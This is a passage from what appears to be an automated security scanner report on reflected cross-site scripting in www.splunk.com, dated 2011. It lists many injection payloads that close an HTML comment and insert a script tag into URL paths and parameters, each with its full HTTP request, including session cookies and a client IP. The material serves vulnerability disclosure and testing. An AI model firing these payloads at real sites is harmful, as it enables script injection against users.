The value of REST URL parameter 1 is copied into an HTML comment. The payload 2498f--><script>alert(1)</script>de17f1d4431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes2498f--><script>alert(1)</script>de17f1d4431/splunk_com/css/slimbox/slimbox2.css HTTP/1.1
Host: www.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:12:36 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: 0
Cache-Control: public, must-revalidate
Pragma: public
Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:36 GMT; path=/
Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:36 GMT; path=/
ETag: e39aa070e2c2e39ff56fe5017ae0ae9d1296943957-gzip
Last-Modified: Sat, 05 Feb 2011 22:12:37 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload fc34e--><script>alert(1)</script>94770923e9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_comfc34e--><script>alert(1)</script>94770923e9a/css/slimbox/slimbox2.css HTTP/1.1
Host: www.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:12:58 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: 0
Cache-Control: public, must-revalidate
Pragma: public
Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:58 GMT; path=/
Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:58 GMT; path=/
ETag: 75f170d65684a73c9175de775ee543ea1296943979-gzip
Last-Modified: Sat, 05 Feb 2011 22:12:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload a38cb--><script>alert(1)</script>1dcff4e2ee6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/cssa38cb--><script>alert(1)</script>1dcff4e2ee6/slimbox/slimbox2.css HTTP/1.1
Host: www.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:13:22 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: 0
Cache-Control: public, must-revalidate
Pragma: public
Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:23 GMT; path=/
Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:23 GMT; path=/
ETag: 894d6171143dc17f5720f7556280e9a21296944003-gzip
Last-Modified: Sat, 05 Feb 2011 22:13:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload e7954--><script>alert(1)</script>d8a7d5b7df7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/css/slimboxe7954--><script>alert(1)</script>d8a7d5b7df7/slimbox2.css HTTP/1.1
Host: www.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:13:49 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: 0
Cache-Control: public, must-revalidate
Pragma: public
Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:50 GMT; path=/
Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:50 GMT; path=/
ETag: fbe93a3e06253d5077954e9d02f4b3361296944030-gzip
Last-Modified: Sat, 05 Feb 2011 22:13:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into an HTML comment. The payload 8158b--><script>alert(1)</script>9e902cde54a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/css/slimbox/slimbox2.css8158b--><script>alert(1)</script>9e902cde54a HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:16 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:16 GMT; path=/ ETag: cef50f9668823485c56e5c1c90b96dd71296944056-gzip Last-Modified: Sat, 05 Feb 2011 22:14:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload af711--><script>alert(1)</script>a24d2298d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themesaf711--><script>alert(1)</script>a24d2298d97/splunk_com/css/v5.php?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
The value of REST URL parameter 2 is copied into an HTML comment. The payload 98594--><script>alert(1)</script>26db2ff63a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com98594--><script>alert(1)</script>26db2ff63a4/css/v5.php?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 21:50:09 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:20:09 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:20:09 GMT; path=/ ETag: cb920ddb93bb4103279686dda03417c01296942609-gzip Last-Modified: Sat, 05 Feb 2011 21:50:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload f740a--><script>alert(1)</script>422a105e703 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/cssf740a--><script>alert(1)</script>422a105e703/v5.php?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 21:50:27 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:20:27 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:20:27 GMT; path=/ ETag: 1428f39b62214888b5438b42d1dc9b321296942628-gzip Last-Modified: Sat, 05 Feb 2011 21:50:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload 6fa8d--><script>alert(1)</script>2c0892ab672 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/css/v5.php6fa8d--><script>alert(1)</script>2c0892ab672?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 21:50:47 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:20:47 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:20:47 GMT; path=/ ETag: 30b81ce7ac45eb518aff5f0affe49be11296942647-gzip Last-Modified: Sat, 05 Feb 2011 21:50:47 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 76c3a--><script>alert(1)</script>8f12478cdc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videos76c3a--><script>alert(1)</script>8f12478cdc7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.495. http://www.splunk.com/videos [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8c760--><script>alert(1)</script>7d5cbb3f69a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videos?8c760--><script>alert(1)</script>7d5cbb3f69a=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76902
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the r request parameter is copied into an HTML comment. The payload a012a--><script>alert(1)</script>bdc5183cb13 was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videos?r=modala012a--><script>alert(1)</script>bdc5183cb13 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76917
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c4614--><script>alert(1)</script>d9aa5331c73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewc4614--><script>alert(1)</script>d9aa5331c73/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.498. http://www.splunk.com/view/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b181b--><script>alert(1)</script>81c722c99ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/?b181b--><script>alert(1)</script>81c722c99ff=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:55 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:55 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:55 GMT; path=/ ETag: 57bbe3de95c4ad027902e4a9cb6c0e0f1296944335 Last-Modified: Sat, 05 Feb 2011 22:18:55 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18248
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
